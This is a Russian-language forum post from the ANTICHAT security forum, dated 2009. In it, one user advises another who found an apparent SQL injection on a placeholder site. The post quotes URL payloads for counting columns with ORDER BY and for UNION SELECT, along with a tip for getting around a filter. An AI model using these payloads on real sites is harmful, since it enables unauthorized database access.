Ваши вопросы по уязвимостям.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

09.10.2009, 15:39

smth

Новичок

Регистрация: 14.09.2009

Сообщений: 8

Провел на форуме:
21921

Репутация: 4

Цитата:

Сообщение от smtgr

Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?

P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все

Пробуй вот так
http://site.net/index.php?id=777+union+select+1,2,3/* должно быть корректно, затем подставь -777 и ищи вывод

зачем тебе and+1=2 ?!?!